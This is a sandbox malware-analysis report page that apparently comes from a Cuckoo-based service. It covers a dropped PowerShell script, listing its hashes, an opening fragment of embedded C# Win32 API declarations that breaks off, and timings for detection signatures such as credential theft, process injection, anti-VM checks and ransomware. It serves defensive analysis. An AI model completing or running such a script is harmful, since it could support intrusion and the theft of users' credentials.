MD5 1f24bdcc538f2234660156420cf8ee40
SHA1 cf38a3cbc67dcf59306a9a739098ac995da73b9a
SHA256 cae594a6ef3c49c953c9d980c8a9f3fe62538052e25e3dd33744b088c4f1c3a5
CRC32 87B543B5
Ssdeep 48:oFvg2ZjWazBzl/gTX5ghgJgP1gNoZMg9g1JgUgvXsgvRghxMglK0B0s+REI2gi:oZdZSaVzFAX5gY0WoWO6JpocoROMy0pC
下载提交魔盾安全分析
文件名 KQSnVak9.ps1
相关文件
C:\Users\test\AppData\Local\Temp\KQSnVak9.ps1
文件大小 9677 字节
文件类型 ASCII text, with very long lines
MD5 995634a1d0bc0cb3a352e29e574a3c47
SHA1 723f366a107d20d2cb971b31b2a01aa8d394f663
SHA256 526298e976e7ed46f04310c99c51aeb499e28a59a682c73644114e303bd016aa
CRC32 604DA640
Ssdeep 192:UYMYUYXzfTfdM4F2InfmCc3y+JFLOKBWZsJdgQzPidaZaakYyzHzYTX1Ag7yWPqm:Ue7T7cHFLOKVJdgQzP9k4X1Ag7y7zNQ
下载提交魔盾安全分析显示文本 
function VcyyMgvYmuCnzB{
Add-Type @"
using System;
using System.Text;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.Security.Cryptography.X509Certificates;
using System.Threading;

public static class pcqEf
{
	public class XEcTYoJfPBuKg
    {
        public string Wndclass;
        public string Title;
        public string Process;
        public IntPtr hWnd;
    }

    private delegate bool PayImryPKI(IntPtr hWnd, ref XEcTYoJfPBuKg data);

    [DllImport("user32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool EnumWindows(PayImryPKI lpEnumFunc, ref XEcTYoJfPBuKg data);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
	
	[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
	static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
	
	[DllImport("user32.dll")]
	[return: MarshalAs(UnmanagedType.Bool)]
	static extern bool SetForegroundWindow(IntPtr hWnd);
	
	public delegate bool gcdSJ(IntPtr hwnd, IntPtr lParam);
	
	[DllImport("user32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	public static extern bool EnumChildWindows(IntPtr window, gcdSJ callback, IntPtr lParam);  
	
	[DllImport("user32.dll", CharSet = CharSet.Auto)]
	static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
	
	[Flags]
    private enum SnapshotFlags : uint
    {
    HeapList = 0x00000001,
    Process = 0x00000002,
    Thread = 0x00000004,
    Module = 0x00000008,
    Module32 = 0x00000010,
    Inherit = 0x80000000,
    All = 0x0000001F,
    NoHeaps = 0x40000000
    }
    //inner struct used only internally
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
    private struct PROCESSENTRY32
    {
    const  <truncated>
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 23.686 seconds )

  • 7.735 Suricata
  • 7.508 NetworkAnalysis
  • 5.167 BehaviorAnalysis
  • 0.873 AnalysisInfo
  • 0.774 TargetInfo
  • 0.652 Dropped
  • 0.603 Static
  • 0.325 peid
  • 0.036 Debug
  • 0.012 Strings
  • 0.001 Memory

Signatures ( 3.799 seconds )

  • 1.256 md_url_bl
  • 0.352 md_bad_drop
  • 0.317 antiav_detectreg
  • 0.265 stealth_timeout
  • 0.206 api_spamming
  • 0.166 decoy_document
  • 0.154 antivm_generic_scsi
  • 0.119 infostealer_ftp
  • 0.084 antianalysis_detectreg
  • 0.08 antivm_generic_services
  • 0.068 infostealer_im
  • 0.039 antivm_generic_disk
  • 0.039 infostealer_mail
  • 0.034 mimics_filetime
  • 0.032 antiav_detectfile
  • 0.029 kibex_behavior
  • 0.028 reads_self
  • 0.028 virus
  • 0.027 stealth_file
  • 0.024 bootkit
  • 0.023 betabot_behavior
  • 0.022 infostealer_bitcoin
  • 0.018 hancitor_behavior
  • 0.016 shifu_behavior
  • 0.016 antivm_parallels_keys
  • 0.016 antivm_xen_keys
  • 0.016 darkcomet_regkeys
  • 0.015 antidbg_windows
  • 0.015 geodo_banking_trojan
  • 0.013 antivm_vbox_files
  • 0.012 recon_fingerprint
  • 0.011 antiemu_wine_func
  • 0.011 persistence_autorun
  • 0.011 antivm_generic_diskreg
  • 0.009 infostealer_browser_password
  • 0.008 kovter_behavior
  • 0.008 antisandbox_productid
  • 0.007 hawkeye_behavior
  • 0.007 network_tor
  • 0.007 injection_createremotethread
  • 0.006 infostealer_browser
  • 0.006 ransomware_message
  • 0.006 antivm_vbox_libs
  • 0.006 injection_runpe
  • 0.006 antivm_vbox_keys
  • 0.006 antivm_vmware_keys
  • 0.006 md_domain_bl
  • 0.005 antidbg_devices
  • 0.005 antivm_xen_keys
  • 0.005 antivm_hyperv_keys
  • 0.005 antivm_vbox_acpi
  • 0.005 antivm_vpc_keys
  • 0.005 bypass_firewall
  • 0.005 packer_armadillo_regkey
  • 0.004 rat_nanocore
  • 0.004 antiav_avast_libs
  • 0.004 tinba_behavior
  • 0.004 kazybot_behavior
  • 0.004 antivm_generic_bios
  • 0.004 antivm_generic_cpu
  • 0.004 antivm_generic_system
  • 0.004 ransomware_extensions
  • 0.004 ransomware_files
  • 0.004 rat_pcclient
  • 0.004 recon_programs
  • 0.003 antivm_vbox_window
  • 0.003 injection_explorer
  • 0.003 browser_needed
  • 0.003 antisandbox_sunbelt_libs
  • 0.003 dyre_behavior
  • 0.003 encrypted_ioc
  • 0.003 cerber_behavior
  • 0.003 network_http
  • 0.002 rat_luminosity
  • 0.002 dridex_behavior
  • 0.002 Locky_behavior
  • 0.002 antisandbox_sboxie_libs
  • 0.002 ipc_namedpipe
  • 0.002 antiav_bitdefender_libs
  • 0.002 exec_crash
  • 0.002 antisandbox_script_timer
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vmware_files
  • 0.002 codelux_behavior
  • 0.002 disables_browser_warn
  • 0.002 network_torgateway
  • 0.001 persistence_bootexecute
  • 0.001 network_anomaly
  • 0.001 antivm_vmware_libs
  • 0.001 sets_autoconfig_url
  • 0.001 stealth_network
  • 0.001 creates_largekey
  • 0.001 ursnif_behavior
  • 0.001 vawtrak_behavior
  • 0.001 securityxploded_modules
  • 0.001 antiemu_wine_reg
  • 0.001 antivm_vpc_files
  • 0.001 banker_cridex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 modify_proxy
  • 0.001 browser_security
  • 0.001 modify_uac_prompt
  • 0.001 network_tor_service
  • 0.001 sniffer_winpcap
  • 0.001 targeted_flame

Reporting ( 0.026 seconds )

  • 0.026 Malheur
Task ID 188774
Mongo ID 5ba21d1da093ef245f83b93a
Cuckoo release 1.4-Maldun